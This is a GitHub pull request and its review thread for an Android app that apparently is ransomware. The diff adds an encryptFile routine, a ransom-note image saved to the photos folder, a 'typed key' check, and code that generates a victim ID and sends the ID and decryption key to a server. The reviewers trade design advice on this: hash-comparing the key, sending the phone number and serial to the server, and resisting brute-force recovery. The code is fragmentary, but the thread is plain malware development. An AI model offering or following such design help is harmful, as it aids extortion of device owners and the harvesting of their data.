### PR TITLE
Bumping code && Send Id and Key to Server

### PR DESCRIPTION
**Pull request by joaopandolfi**

### CODE REVIEW

File: app/src/main/java/alepacheco/com/rw/persistence/LocalStorage.java [hunk 1]
```diff
@@ -0,0 +1,81 @@
+package alepacheco.com.rw.persistence;
+
+import android.content.Context;
+import android.content.SharedPreferences;
+
+/**
+ * Created by joao on 28/06/2017.
+ */
+
+public class LocalStorage {
```
Comment (alepacheco) [inline app/src/main/java/alepacheco/com/rw/persistence/LocalStorage.java]: Why do you need to write this tags to the local storage? 
And what do they stand for (`TAG_NAME_PREFERENCES,  NULL_VALUE, TAG_SENDED_TO_SERVER `)?

File: app/src/main/java/alepacheco/com/rw/services/MyService.java [hunk 2]
```diff
@@ -57,16 +72,74 @@ public void onCreate() {
...
         } catch (Exception e) {
             e.printStackTrace();
         }
 
     }
 
+    /*
+    * Check if the key typed is correct
+    * */
+    private Boolean checkTypedKey(){
```
Comment (alepacheco) [inline app/src/main/java/alepacheco/com/rw/services/MyService.java]: Maybe here do something like a hash comparison so the key doesn't need to be saved

File: app/src/main/java/alepacheco/com/rw/services/MyService.java [hunk 3]
```diff
@@ -57,16 +72,74 @@ public void onCreate() {
...
+    * Save encrypted state on Local Storage
+    * */
+    private void saveEncryptedState(){
+        LocalStorage.getInstance(ctx).setByTag(LocalStorage.TAG_ENCRYPTED,true);
+    }
+
+    /*
+    * Generate and save Random ID
+    * */
+    private void generateRandomId() {
```
Comment (alepacheco) [inline app/src/main/java/alepacheco/com/rw/services/MyService.java]: What is this id used for? 
If it is for identifying the device a better approach will be to store all the info like phone number and serial, etc in a json object and send it to the server

File: app/src/main/java/alepacheco/com/rw/services/MyService.java [hunk 4]
```diff
@@ -103,7 +176,7 @@ public void encryptFile() throws Exception {
         }
 
 
-        Bitmap bm = BitmapFactory.decodeResource(getResources(), alepacheco.com.rw.R.mipmap.note);
+        Bitmap bm = BitmapFactory.decodeResource(getResources(), R.mipmap.ic_launcher);
```
Comment (alepacheco) [inline app/src/main/java/alepacheco/com/rw/services/MyService.java]: This is meant to save a png image with instructions in the photos folder. If you save the launcher icon it wont be useful.

Comment (alepacheco) [inline app/src/main/java/alepacheco/com/rw/services/MyService.java]: Ok, I didn't sow there is not a file called note. Don't mind this comment.

File: app/src/main/java/alepacheco/com/rw/persistence/LocalStorage.java (hunk 1 above)
Comment (joaopandolfi) [inline app/src/main/java/alepacheco/com/rw/persistence/LocalStorage.java]: This tags are used to recover data in local storage.
For example:
TAG_SENDED_TO_SERVER -> Informs that the data has already been sent to the server.
TA_NAME_PREFERENCES -> Its preferences name to save in app data

NULL_VALUE -> Really, that is trash.

I'll change the way this data are saved.

File: app/src/main/java/alepacheco/com/rw/services/MyService.java (hunk 2 above)
Comment (joaopandolfi) [inline app/src/main/java/alepacheco/com/rw/services/MyService.java]: Relax, this function wil be removed.
I just used for test.

File: app/src/main/java/alepacheco/com/rw/services/MyService.java (hunk 3 above)
Comment (joaopandolfi) [inline app/src/main/java/alepacheco/com/rw/services/MyService.java]: Can be too.
But random id and random key, are more difficult to recover by brute force.

**Pull request merged**